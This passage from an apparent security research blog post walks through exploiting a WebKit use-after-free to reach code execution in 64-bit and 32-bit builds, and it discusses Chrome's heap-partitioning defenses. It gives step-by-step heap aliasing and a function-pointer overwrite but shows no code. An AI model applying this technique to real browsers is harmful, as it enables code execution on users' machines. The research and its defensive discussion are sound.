  7. Now we can access array[0] as a Uint8Array that will read and write relative to the BSS!
  8. Read the strtol() function pointer out of the BSS. From that, calculate the system() function pointer since both are in Write back system() on top of strtol().
  9. Call new Date(‘xcalc;’) and profit… or at least, calculate. The C++ implementation of the JavaScript Date constructor calls strtol() on the string argument, hence the sound of popping calcs.

Obligatory screenshot:


You can download the exploit file here: arrsort_exploit_fake_uint8.html

Proceeding with exploitation: 32-bit

Surprise! Bonus! The very same exploit file actually works on 32-bit. The code acts a bit differently to use different object sizes, object field offsets and deltas. But the steps taken are the same for both the 64-bit and 32-bit cases.

Here’s a different working, reliable 32-bit exploit that I wrote earlier: arrsort_exploit_32bit_alt.html

There are some similarities but It takes a different path and also achieves reliable code execution. This is perhaps a testament to the quality of the vulnerability. Briefly, this alternate exploit works like this:

  1. Use a simpler way to leak the pointer values from the ArrayStorage header, by directly reading double values in the sort callback. These double values are converted to raw bytes using the JavaScript DataView object.
  2. Use the aliasing primitive previously described to alias a Uint8Array buffer with an ArrayStorage object.
  3. Add some spare keys to the aliased ArrayStorage object, causing the allocation of the m_sparseValueMap pointer, pointing to a 20 byte HashMap object.
  4. Read the m_sparseValueMap pointer and use the previously described freeing primitive to free it.
  5. Allocate a 24 byte Uint32Array backing buffer. The 24 byte backing buffer goes in the hole we just freed.
  6. Free the same address again, freeing the Uint32Array backing buffer.
  7. Allocate another 4 byte Uint32Array. The 24 byte Uint32Array metadata object will go into the hole we just freed.
  8. We have now aliased a Uint32Array backing buffer with a Uint32Array metadata object. Proceeding from here is simple because we can read the Uint32Array vtable and also change the backing buffer pointer and length to read / write arbitrary memory.

The main quirk here enabling this alternate and slightly simpler exploit on 32-bit is the observation that on 32-bit, sizeof(WTF::HashMap) == 20 and sizeof(WebCore::Uint32Array) == 24. Due to the 8 byte granularity of small fastMalloc() buckets, these two different objects occupy the same heap bucket size of 24.

Browser defenses

The astute reader will note that any use-after-free in WebKit might be subject to the same exploitation technique in JavaScript: allocate a Uint32Array backing buffer into the freed hole and then enjoy a wide variety of side effects. This is definitely a concern! And it also illustrates the power and possibilities of the use-after-free vulnerability class. Using this technique, the attacker gets to choose arbitrary bytes for every field in the object that is being used after free. The attacker can pick an arbitrary vtable (call-after-use-after-free), arbitrary flags / arbitrary length (read-after-use-after-free), fake arbitrary object pointers (call or read or write-after-use-after-free), etc. If the code paths available to the attacker include write-after-use-after-free, the attacker might well be able to access information leaks, or perform precision corruption of other similarly sized object types.

Perhaps this primitive is too powerful to leave unmitigated? It is. So, some time ago, I broke this primitive in Google Chrome, by placing ArrayBuffer backing buffers into their own heap partition. This should ensure that when a use-after-free vulnerability triggers, it is not possible to place an ArrayBuffer backing buffer into the freed hole. There are other object types that might offer similar attacker control of content (strings, etc.) and various related changes also applied partitioning to these and other objects. The goal is that with the partitioning present in Google Chrome, the attacker has less control over the aliased bytes used by code after a use-after-free condition.

It might also be tempting to declare war on allocator determinism. After all, it makes things simple if the most recently freed chunk is the first to be handed out. And indeed there are various schemes popping up to reduce freelist determinism, such as freelist randomization in the Linux kernel. I’m not actually a fan of these schemes for most exploitation contexts. If the attacker is running some form of “script”, such as JavaScript in a browser, or a user space program on Linux, they can just allocate multiple objects to achieve the same desired effect.


I think that use-after-invalidation and use-after-free are wonderful and maybe underappreciated vulnerability classes. Perhaps after reading this post, you concur? We selected a suitably interesting and powerful vulnerability and demonstrated a large range of reliable, controllable and powerful side effects.